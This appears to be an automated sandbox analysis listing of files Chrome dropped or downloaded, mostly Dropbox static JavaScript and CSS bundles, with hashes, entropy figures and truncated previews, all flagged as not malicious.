                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="45928f56-7aad-319b-9b61-98e941679f02")}catch(e){}}();.define(["require","exports","react","./e_file_viewer_static_scl_page_file","./c_lodash","./c_plugin_utils_getImageDefaultSizes","./c_security_csrf_hmac","./c_hive_schemas_sharing-request_access_user_events","./c_api_v2_routes_user_metadata_provider","./c_viewer_refresh","./e_core_exception","./c_core_i18n","./c_api_v2_noauth_client"],(function(e,t,n,r,o,a,i,s,l,u,c,d,p){"use strict";function f(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var r=Object.getOwnPropertyDescriptor(e,n);Object.defineProperty(t,n,r.get?r:{enumerable:!0,get:function(){return e[n]}})}})),t.default=e,Object.freeze(t)}var g=f(n);const _=(e,t)=>{const n={};for(const[r,o]of Object.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (3875)
                                                                        Category:dropped
                                                                        Size (bytes):4278
                                                                        Entropy (8bit):5.200774342888625
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:579612776FED0F1104AA9DD0D837404C
                                                                        SHA1:A58C4D6BF81C2531826F0EED42A4440A50B274EF
                                                                        SHA-256:AD3477696A618CDF1F78245A3AA247D62029A88115A590588541C4180BB201F6
                                                                        SHA-512:2A8D2129E91AEFADDCF98F0D96E4BE8F4D0864AF230B3DA7F176C8BAF5C1F1881D4BC8FDA2E7EA52521AC4BB4953F7435C1A07B59B926B5CCD7449AF0CF0F9A2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="3f2320f4-3a3f-3f4a-a616-9961d5cefa7a")}catch(e){}}();.define(["exports"],(function(t){"use strict";function e(t,e,r={}){if(t)return;const s=new Error(`Assertion Error: ${e}`),{tags:i=[],exc_extra:n=null}=r;throw s.assertOptions={tags:i.concat("module:exception","assert"),exc_extra:n},s.isAssertion=!0,s}const r=/^(?:([^:\/\\?#]+):)?(?:[\/\\]{2}([^\/\\?#]*))?([^?#]*)(?:\?([^#]*))?(?:[#](.*))?$/,s=/^[a-zA-Z][a-zA-Z0-9+.\-]*$/;class i{constructor(t={}){this.dict={},this.add(t)}static parseString(t){if(!t)return{};const e={};return t.split("&").forEach((t=>{if(""!==t){const r=t.split("="),s=i.decode(r[0]),n=i.decode(r.slice(1).join("="));if(e.hasOwnProperty(s)){const t=e[s];let r;r="string"==typeof t?[t]:void 0===t?[]:t,r.push(n),e[s]=r}else e[s]=n}})),e}add(t,e){if("string"==typeof
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (729)
                                                                        Category:downloaded
                                                                        Size (bytes):786
                                                                        Entropy (8bit):5.167258852207224
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:75ED595D4A569CF9073CD6EEE308B3B3
                                                                        SHA1:13F9416A70CEEA9033A496A6AA5B922B72A6FBE2
                                                                        SHA-256:34BA9C679427ACA43C1321759FAE0373E54B68661E8D12FB59BDB1F3D93ED1E8
                                                                        SHA-512:7860705ED80A784187CB3303CF06C3FD597121A73C751CAB9059C2E834D0EB689C25018F668C8C5EF11F74C50E29B1D795F92F18E58ECEB697C2B225BC362DA3
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/js/signup_signin/unified_susi/common/inputs/auth_checkbox.module.out-vflde1ZXU.css
                                                                        Preview:._susi-checkbox_1lyd3_3{align-items:center;display:flex}._susi-checkbox_1lyd3_3._two-factor-checkbox_1lyd3_8{border-radius:3px;box-sizing:border-box;display:inline-block;line-height:normal;margin:2px 0 5px;max-width:230px;min-height:34px;padding:25px 0 10px}._susi-checkbox_1lyd3_3._two-factor-checkbox_1lyd3_8 input{cursor:pointer;height:14px;margin:0;padding:0;vertical-align:middle;width:14px}._label_1lyd3_28{font-size:12px;line-height:16px;padding-top:1px}._label_1lyd3_28,._label_1lyd3_28._login_1lyd3_37{font-family:var(--__dwgAtlasGroteskStack);font-weight:400;margin-left:var(--dwg-spacing__unit--1)}._label_1lyd3_28._login_1lyd3_37{font-size:16px;line-height:20px}._icon-container_1lyd3_45{display:flex;margin-left:4px}./*# sourceMappingURL=auth_checkbox.module.out.css.map */
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):160
                                                                        Entropy (8bit):5.038924068526502
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:00E3748EF6EF9B75F69F6AC20471BC85
                                                                        SHA1:713BD618ADFC43F6EC695CFE3788D19708666FB1
                                                                        SHA-256:5E49FEF385C5BDA41E5FD72F0D0FB2E76722A5C156CAC7AFDBDCD9C6B9B9648A
                                                                        SHA-512:0FED16F611FBF747CF393BC51D656527BFE0D313A6A77AD7A8E98F9FEBF147041D52F2D74DE542B222F3ECC02C97EC11839EA63366654ED2816B7726A0F63715
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/js/signup_signin/unified_susi/susi/susi.module.out-vflAON0jv.css
                                                                        Preview:._susi-form-container_vmoxa_1{position:relative;text-align:left;width:100%}._current-form_vmoxa_7{display:block}./*# sourceMappingURL=susi.module.out.css.map */
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2051)
                                                                        Category:downloaded
                                                                        Size (bytes):2110
                                                                        Entropy (8bit):5.045839121437345
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:72F9A26C26C1A681AD75A7E270550788
                                                                        SHA1:5579A02442ADFE9980A87BF495B18260927CD146
                                                                        SHA-256:F4024DCE9F70735047ADC3A8CF7E8AC9FD2E1D4BFF6ABFC4158A1810EDFCE45F
                                                                        SHA-512:0CFAF5CBD337D6D04A6D6AB1B2E86F943A93CC835B20C0DE00A309D69EDD9E6828470D6DA2D8E263A8FADEF6E58C4AD679D88062184A09D4F190CD19427EFB55
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/js/signup_signin/unified_susi/common/inputs/auth_text_field.module.out-vflcvmibC.css
                                                                        Preview:._susi-auth-field_4srl7_4{display:flex;flex-direction:column;font-family:var(--__dwgAtlasGroteskStack);line-height:normal;margin-bottom:var(--dwg-spacing__unit--2);text-align:left;width:100%}._susi-auth-field_4srl7_4._login_4srl7_14{margin-bottom:var(--dwg-spacing__unit--0_5,4px)}._show-password-button_4srl7_18{bottom:12px;display:flex;position:absolute;right:22px;width:24px}._show-password-button_4srl7_18 ._show-password-icon_4srl7_26{color:var(--color__standard__text)}._password-capslock-warning_4srl7_30{bottom:7px;padding:var(--dwg-spacing__unit--1,8px);position:absolute;right:20px;visibility:hidden}._password-capslock-warning-register_4srl7_38{right:42px}._password-capslock-warning--visible_4srl7_42{visibility:visible}._password-capslock-warning-icon_4srl7_46{width:10px}._field-input-wrapper_4srl7_50{margin-bottom:0;position:relative}._field-input-password_4srl7_55:not(:focus)~._password-capslock-warning_4srl7_30{visibility:hidden}._field-input_4srl7_50{border-color:var(--color__st
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1827)
                                                                        Category:dropped
                                                                        Size (bytes):2228
                                                                        Entropy (8bit):5.385984609966965
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:7306B765A505D66A863219E166715061
                                                                        SHA1:C64C86BC805A5CAA2848EDB87B38BF61311C4759
                                                                        SHA-256:82376BF0DD6EA4AAC972FAC8D326E7C91D80D8D3FCF9679B70EADF71EC1DCF4D
                                                                        SHA-512:A59BB1D72347217B9A81942EAB903202B872914493D50818F38FAFF143D5B4CF582B3F65F17DDEEC4F0C83518F1D88450152F38F677F4F4547110767381DD299
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="100fea19-e00b-3c09-ae13-8f0b365c66b5")}catch(e){}}();.define(["exports","./c_lodash","react","./e_file_viewer_static_scl_page_file"],(function(e,t,r,n){"use strict";function o(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var i,s=o(r),u={exports:{}};i=u,function(){var e={}.hasOwnProperty;function t(){for(var r=[],n=0;n<arguments.length;n++){var o=arguments[n];if(o){var i=typeof o;if("string"===i||"number"===i)r.push(o);else if(Array.isArray(o)){if(o.length){var s=t.apply(null,o);s&&r.push(s)}}else if("object"===i){if(o.toString!==Object.prototype.toStri
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2228)
                                                                        Category:downloaded
                                                                        Size (bytes):2616
                                                                        Entropy (8bit):5.288603182751224
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E416279EF6ED5606BCA5D521FBC28BEF
                                                                        SHA1:79C86F1D8C266D61BAB579163E0D96F80184D508
                                                                        SHA-256:CBFE60235EB48838EC9975696F979D7AA0043641410D3E3A610ED1BA222BEBF6
                                                                        SHA-512:7CA0462C0252D3A29B34AB3CE9872FEC97EE210101641F95721489FDD0BAFEE6FFE5BC922842E150903EAED69A1E94B780CD49DE4279B358FA889546530EFDA0
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_ai-vfl5BYnnv.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="587dba52-9e24-3256-b247-2823e48af0c1")}catch(e){}}();.define(["exports","react"],(function(e,l){"use strict";function c(e){if(e&&e.__esModule)return e;var l=Object.create(null);return e&&Object.keys(e).forEach((function(c){if("default"!==c){var t=Object.getOwnPropertyDescriptor(e,c);Object.defineProperty(l,c,t.get?t:{enumerable:!0,get:function(){return e[c]}})}})),l.default=e,Object.freeze(l)}var t=c(l);e.AiLine=e=>t.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},t.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M12.5 10.25c0-1.21.54-1.75 1.75-1.75H15V7h-.75c-1.21 0-1.75-.54-1.75-1.75V4.5H11v.75C11 6.46 10.46 7 9.25 7H8.5C6.586 7 5 8.586 5 10.5S6.586 14 8.5 14v-1.5c-1.086 0-2-.914-2-2 0-1.086.914-2 2-2h.75c1.21 0 1.75.54 1.75 1.75V11h1.5v-.75ZM11 7h1.5
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):374
                                                                        Entropy (8bit):5.109325687973052
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:FF67FC0E3D543E3AA1023BB02436F7E9
                                                                        SHA1:24AE85118FEC99B33086B3787D66A7F50F76FDB5
                                                                        SHA-256:0BC14F3F2360C4E70CFDBC967C419B51E594F447A4603DBF6012136AB7F94A2D
                                                                        SHA-512:7573D06020FE4191F1AA40722D09CFBDC93BE943BDC88FAE22D3D141E7D3DD2BA27765FA5BED9B306F384B9A25D49981E2CB422964164D16ACF99992C0E79C9E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/icons-vfl_2f8Dj.css
                                                                        Preview:/** @generated -- This file is automatically synced from @dropbox/dig-icons@4.4.0. DO NOT MODIFY! **/../**. This file should not be imported into your CSS or SASS files - the CSS variables will be available on the page for you to use.. DO NOT USE THIS FILE OR THE CSS VARIABLE TOKENS WITHOUT FIRST TALKING TO THE DESIGN SYSTEMS ON-CALL (SEE #design-systems ON SLACK).**/..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):27
                                                                        Entropy (8bit):4.310443057719025
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5F93B28615B073216CC8AE4726DFF755
                                                                        SHA1:6513E504329B56E2B47FB6E1BA31A389CC44D08C
                                                                        SHA-256:95D582F1BAD5E34889DCAAD811D54B4BCD8A29F9042F25F3A3CED25CF21B54BF
                                                                        SHA-512:8A6B9EDB12630DAC893A140112FF880E2C68661DF0A51882BC430CE0200263893E1198B116D7E0C0E85C778434CF3AEF26E81F90BFE1889EBC70D2CF50247F67
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:fcAnalytic({"logged":true})
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 564 x 168, 8-bit colormap, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):5975
                                                                        Entropy (8bit):7.8905319773925475
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:FFC0FC3CC70C7E7775A833DC8176CDBB
                                                                        SHA1:08F561D3C63F15C31132C5BA7BBA7F6C41E51E44
                                                                        SHA-256:923D80C7AE9A06D102F46B3E47564FA6FADD9A2F3DD3633CC19AC5EEB25BD4AD
                                                                        SHA-512:D34201CD6A3B87F00993CC18A2D2FA51F3883106529768CB26F7E4685EBEAB7E58674DB096E2407B013B56E3D05B6AF9FB6739980150E4486F85C611BCB10289
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://static.cdninstagram.com/rsrc.php/v3/yz/r/c5Rp7Ym-Klz.png
                                                                        Preview:.PNG........IHDR...4..........n. ....PLTEGpL......ttt...\\\fffooo___UUUbbb{{{XXXjjj...........w...>>>...%%%.....................```...........................,,,...................7B.......5C.......1F.......2E............OOO...........................+K.(M.........qqq.'M........I....*L.3D.4D....,J....0G......-I. R..w.....w...........v.%N.......0G."Q.....v.....v.#P..............v..u.$O.......R4.....v........v..........n..-I..v....$O...+.`..5.|||.o..';..D...hhh..7.l.+.`..!.....n..(?......ttt..yL?.+.<<<..{..S5....4.GGG.yK.-?..K...........F(,.y6....#.o...4.#I@.p....<g.$.n....m....111......oa......zf...,.g>.....#.f`...&5Q..0.s..2..kkk....~...$..0..,</..,......3.D..&...,C%.a.2?......x.[J...1[M.......^P.....C'1.x..(..'..-.+H...._j......^.{...5.W37,.z.s.\8.....!.R....|^..i..h.............tRNS.....W..p...<...F.....IDATx...{..U.......s.....f..Gq@........pS4..B,..6...`Vk.)..B.@..ly..b.L*............. .5j|.9...g.y........w......s~...@..%..c0...d..~..e...7.z.Z...(..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2279)
                                                                        Category:downloaded
                                                                        Size (bytes):2677
                                                                        Entropy (8bit):5.329330150581034
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:14FEF2A360137C6FA3CC2DF3C94F0CD4
                                                                        SHA1:7F27069AF434F4F787D9A418CB892A632C765867
                                                                        SHA-256:0C0993C4938DF27DC1750FC9FB88A4D27F0E32BC0D84EFBCFD6F10299F185F87
                                                                        SHA-512:7467AB0C237F20BBCE145407EDA0D4A5EFA9F854B2FF7234720FA8D6B14094E3003F8A99DD136F21B8BFA6E2CCCE5DBCDB9E4749ABA83FEEC77D702A35A309DA
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_rotate-right-vflFP7yo2.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="7241f9ff-77ac-3ecf-9bac-6c24373c26b4")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function l(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(l){if("default"!==l){var n=Object.getOwnPropertyDescriptor(e,l);Object.defineProperty(t,l,n.get?n:{enumerable:!0,get:function(){return e[l]}})}})),t.default=e,Object.freeze(t)}var n=l(t);e.AutomationLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"m10.5 15 4.5-3-4.5-3v6Z",fill:"currentColor",vectorEffect:"non-suserng-stroke"}),n.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"m16.453 11.06 1.114-1.417-.742-1.286-1.555.224-.479-.322a3.94 3.94 0 0 0-.79-.409l-.613-.234L12.742 6h-1.484l-.646 1.617-.614.23
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 26397
                                                                        Category:downloaded
                                                                        Size (bytes):8567
                                                                        Entropy (8bit):7.970981606650712
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D54749796440892B73CF0B25A2A4D478
                                                                        SHA1:1D09923ABDAADD031F9E81D08824BCFBEBF7822C
                                                                        SHA-256:38AA06E7FC48BF675FA01850F173AC84FCB060A5B0C45414AFEF0772E64FC638
                                                                        SHA-512:E91A66444EAE00D877BBE31889AE4DABB8835BDD7DF57C801DF67BB57AF676989112E40D0A4895979107657B60F6FADF2646A15EB8A7375051758263A402A9BB
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/webpack/production/paper_admin~paper_admin_off_view_only~paper_binder~paper_bundle~paper_cloud_docs~paper_dashboard~pap~d5f38892_2dc9d4258e51e09c0dc9.5Gm5uwgWyRnN9J9fnMpZwbAXygihTlOI-wALhJXiFZI.js.gz
                                                                        Preview:...........}.[.8....+.{3.b.wH..C.}.Nw.5p;.<.<.V....e .|..=%..'izfw.'.Y.R....*.g4...../.O...<..g..'..|....>......;..y6.oo...T.x......px.......y`<.....8..G..<..E...d..Ad...'..n...nywx....vw.>..s..<.x.o.. .C...).j.+......zx.D......4P..R$.O(WWJH.....`\.O..n..<.....N.a...;[..........Kx.:.>D8.......C8.....w..p...v........-.......;..!.w6{..0......!........c....#..p.`..i...........<RLp...C.K _.m.t.D.....D..;d....>....pV .g......=}Q...0E..|.f...i..$..e.....x....4..g....Q.%.*..R.G..T..A...6...R.....H.*C.'I.P.$U.../T.J....4.Qu........f?...........d.6...ao0..g.2.6....n...9.....`HXB..W...n..M...(...Q.A..N..I.C..rD.(......;..z.....z.7.rl_...C]..].c.O...Y(V.]...........5........!=2.}.L.7...|(..TYA...H..k{........L.Z.w{.. =.@3.&@0..2.9}v...s.dT].5... .F$)Q.....q.z.t.....>.g.&...%..k.H.%.dB.........5.+_..br".#.>.$H.......%..d|.A.."S.,.I_b.p.L...k2.{...%#...v.t.O._.q.......,.".e...._QH....4&..3R..<.S.,.......'.Ir#..../.`.........E...p.Y6z.+0.R...Lt:b^q.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2601)
                                                                        Category:downloaded
                                                                        Size (bytes):2992
                                                                        Entropy (8bit):5.305719153744028
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C734660EF2B3297C4A155051AFA95E8C
                                                                        SHA1:217BB8CBC75577CDBE2BF4BBF883F630B28455FF
                                                                        SHA-256:663A3F1A1ED275882BF4586085044AECF3A0C7DFD9E629245904564D48B65AD1
                                                                        SHA-512:DF239270B7C2B0782D3F3D45AC743320C7DF9F45E02A18BC2CC9EF3430BFCD4925D8680EC806B46A02EA39C91EAFCE03D489BAEB1E59875075C6B1912E410489
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_share-vflxzRmDv.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="3af252b2-d9da-357c-a120-ff81863491c1")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function c(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(c){if("default"!==c){var n=Object.getOwnPropertyDescriptor(e,c);Object.defineProperty(t,c,n.get?n:{enumerable:!0,get:function(){return e[c]}})}})),t.default=e,Object.freeze(t)}var n=c(t);e.AnalyticsLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M17.5 6H6v11.5h11.5V6Zm-13-1.5V19H19V4.5H4.5Z",fill:"currentColor",vectorEffect:"non-suserng-stroke"}),n.createElement("path",{d:"M8 11.5h1.5V15H8v-3.5Zm3-1.5h1.5v5H11v-5Zm3-1.5h1.5V15H14V8.5Z",fill:"currentColor",vectorEffect:"non-suser
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 29493
                                                                        Category:downloaded
                                                                        Size (bytes):6985
                                                                        Entropy (8bit):7.967991812843432
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:6980634305D3C6CD89A5477AE1B54C45
                                                                        SHA1:6043660B3209AC3A7F4CEFDFD337F9157D8B1716
                                                                        SHA-256:B2EC5E6474E904D4BC7BA890D6957F2079CEA41507F58BF878FFEABBD8B6D000
                                                                        SHA-512:0F0E50413454B25A8B2540B1EFB450EC46602204B28A0AA419DDCD481DE20B1DDC391DAC7C52530F80482F510C7E342B59D2207FFC501DD79C360DF406B20F4F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/webpack/production/m-paper_pifs.bdc1783ab46bfb213b9b6b132d23cd78da22b452.UXAE97w25tQ0Df7yHm_fXH71CVV5qv7pl43a2rw44xE.css.gz
                                                                        Preview:...........=k..8...Wp....Y...~FLl?vv:b^..s{...A......l.Q..B/.@..w..L.R.R.T*..JO.c.....;..f.[.QL.+.q.>O... y..h....1.v6..*.It...;..s..l...P..!2.n:z..1.../ ...n..e..E..{....c..6.<ZG8.E..i.x"v.#..8..[...$........)(v(.X.Y~ZK..7_...-Y.~~z..(..DraQ...2......f.....y..m.O.=D.=Y..t+.r..<..b....7.L.X..j...]..Y..".....0#k.U.3......W.g..:w..R.r...V[...J..'......].I...Q..j....v...D...dq).|OJ.......d.V{s........W.@p{m......0F.*.....Yl.)h...O..D..-..{.[..R.........O....-W`K`...*A....+@.`F...8..b..w-f.8?.v.....r..5u..b..:....Y..OR8.N~Z3.w.9FT.m..3R...q.....lJ...\...i..0.!.CQ.b%P....S.."?=op|...N.D.....5.....;.....r....([...(...w.qQ.u. ..p&...^..\.R..Cq.>j..t'4..C|..z..A5L..(..q.....(...Q.WB.3..'..Y%)p..'j.?...<@y:..r....l.VL...Y...O0...SUN....dj.n.C.....?.Fk......8.V.5U6......XN..l..Ts....:.irr.ok....j.Pu.R%a....M.....5.......f......'1..}|.......`..8...($k...(...8.S.V...".q.(..d....X... (...g#:.....2...s'^0z^....qr.....A...N...P.....B..(.....(qa.'.T..l.E.G.h
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (4335)
                                                                        Category:dropped
                                                                        Size (bytes):4730
                                                                        Entropy (8bit):5.138828218886794
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:DCC90F19B00757CBE989E4F8578E4F3D
                                                                        SHA1:05F45403A6C1A85F655F29E0DF98B9EEA23E9BB3
                                                                        SHA-256:72E9ADCF24648B6113B76E4D51545DE61BE713D56E23E650BA06A9D9E9D0BC53
                                                                        SHA-512:4797FBBD6E36ED1FB88A70E215D2B52324F2D53C367CFD0D39B64AC098632589C8B5FAAAC204F8652F600A3A69EFC97D0735F5855AE8492A44E8CDA51E25FD4F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c06b5b8e-c0cc-38a7-ae2f-bb365c09143c")}catch(e){}}();.define(["exports","react","./c_dig-content-icons_hooks_useContentIconViewbox"],(function(e,a,l){"use strict";function t(e){if(e&&e.__esModule)return e;var a=Object.create(null);return e&&Object.keys(e).forEach((function(l){if("default"!==l){var t=Object.getOwnPropertyDescriptor(e,l);Object.defineProperty(a,l,t.get?t:{enumerable:!0,get:function(){return e[l]}})}})),a.default=e,Object.freeze(a)}var n=t(a);const c=()=>n.createElement(n.Fragment,null,n.createElement("path",{d:"M65 2.5H11C7.76787 2.5 5.26617 3.13845 3.56447 4.39771C1.86277 5.65681 1 7.50807 1 9.9V68.1C1 70.4918 1.86277 72.343 3.56447 73.6023C5.26596 74.8616 7.76766 75.5 11 75.5H65C68.2321 75.5 70.7338 74.8616 72.4355 73.6023C74.1372 72.3432 75 70.4919 75 68.1V9.9C
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (14794)
                                                                        Category:dropped
                                                                        Size (bytes):15170
                                                                        Entropy (8bit):5.258962016626546
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E9DA9D08F6B7EAE9AB228C3D0A37D015
                                                                        SHA1:D2A9C6C8518C56CDD6904E601D0F1A34CA9171AD
                                                                        SHA-256:4B81DE48B5FB3EFBFE5A7A386BE3DC443D2389E291D3046B1E1F6CDE8E5184D1
                                                                        SHA-512:D78F6B470379A18DE8207BDCAD32C733A00170ED003C2A6F1558E85A433CCD3EEA7970F2265FC402F5277B1192902A61B430618B8CFAE40D8B40E10E7EB4E7F0
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="b6adeb80-ee6f-383e-9813-25383d5515b3")}catch(e){}}();.define(["exports","./c_pap-events_sign_save_signature_doc","./c_api_v2_routes_user_metadata_provider","./c_hive_schemas_sharing-request_access_user_events"],(function(e,t,s,r){"use strict";var o,n,i;e.ApiV2HeaderNames=void 0,(o=e.ApiV2HeaderNames||(e.ApiV2HeaderNames={})).DropboxApiArg="Dropbox-API-Arg",o.DropboxApiSelectAdmin="Dropbox-API-Select-Admin",o.DropboxPathRoot="X-Dropbox-Path-Root",o.DropboxUid="X-Dropbox-Uid",o.DropboxTeamId="X-Dropbox-Teamid",o.DropboxTeamAuthorization="X-Dropbox-Team-Authorization",o.CsrfToken="X-CSRF-Token",o.DropboxForceQuic="X-Dropbox-Force-Quic",function(e){e[e.TeamAdminRole=0]="TeamAdminRole",e[e.MTARole=1]="MTARole",e[e.FederationAdminRole=2]="FederationAdminRole"}(n||(n={})),function(e){e
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (47261)
                                                                        Category:downloaded
                                                                        Size (bytes):47262
                                                                        Entropy (8bit):5.3974731018213795
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                        SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                        SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                        SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js
